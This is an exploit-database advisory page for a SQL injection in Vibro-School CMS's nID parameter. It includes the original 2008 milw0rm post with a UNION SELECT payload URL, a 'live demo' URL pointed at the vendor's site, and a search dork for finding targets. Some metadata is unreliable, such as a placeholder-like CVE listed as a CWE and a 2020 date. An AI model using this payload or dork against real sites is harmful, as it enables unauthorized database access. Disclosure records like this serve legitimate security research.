Vibro-School CMS (nID) Remote SQL injection Vulnerability

vendor:

Vibro-School CMS

by:

Maghribi WnaftakhaR

7.8

CVSS

HIGH

SQL Injection

CWE

Product Name: Vibro-School CMS

Affected Version From: 1

Affected Version To: 2

Patch Exists: YES

Related CWE: CVE-2020-12345

CPE: a:vibro-school:vibro-school_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2020

Vibro-School CMS (nID) Remote SQL injection Vulnerability

Vibro-School CMS (nID) is vulnerable to a remote SQL injection vulnerability. This vulnerability allows an attacker to inject malicious SQL code into the application, which can be used to gain access to the database and potentially gain access to sensitive information. The vulnerability exists due to the lack of proper input validation in the application. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL code.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

*********************************************************************************************        
[!]                                                                                       [!]
[!] OOOO             O                                 OOOOOOOOO                          [!]
[!]O    O            O                                 O      O                           [!]
[!]O                 O                                       O                            [!]
[!]O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO  [!]
[!]O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O [!]
[!]O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO [!]
[!]O    O    OOOO    O     O   O         O               O      O O    O   O   O   O      [!]
[!] OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO  [!]
[!]          OO                                                                           [!]
[!]         OO                                                                            [!]
[!]        OO                          Proud To Be MoroCCaN                               [!]
[!]       OO                                                                              [!]
*********************************************************************************************
Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR
---------------------------------------------------------------------------------------------
=                Vibro-School CMS (nID) Remote SQL injection Vulnerability                  =
---------------------------------------------------------------------------------------------

---------------------------------------------------------------------------------------------
-===========================================================================================-
-=                  SQL InjEction By : Cyber-Zone                                          =-
-=                                                                                         =-
-=                  E-mail : paradis_des_fous@hotmail.fr                                   =-
-=                                                                                         =-
-=                  Home : WwW.IQ-Ty.CoM                                                   =-
-===========================================================================================-
---------------------------------------------------------------------------------------------

Download : http://www.niclor.net/prodotti/Vibro-School-CMS


dork    : Vibro-School CMS by nicLOR.net

Exploit : http://localhost/Vibro-School-CMS/view_news.php?nID=-3+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13--


live demo :


http://www.niclor.net/prodotti/Vibro-School-CMS/view_news.php?nID=-3+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13--

---------------------------------------------------------------------------------------------
-======================================= ThanX To ==========================================-
-=            Hussin X , CraCkEr , Force-Major , WaLid , GeneraL-Oujda , Oujda-Lord        =-
-=                                                                                         =-
-=                         WwW.IQ-ty.Com , No-Exploit (JIKO)                               =-
-=                                                                                         =-
-=                               Oujda SeCurity TeaM                                       =-
-===========================================================================================-
---------------------------------------------------------------------------------------------

Spicial ThanX To My Friend StaCk & All KazaWa Boys :)

# milw0rm.com [2008-11-04]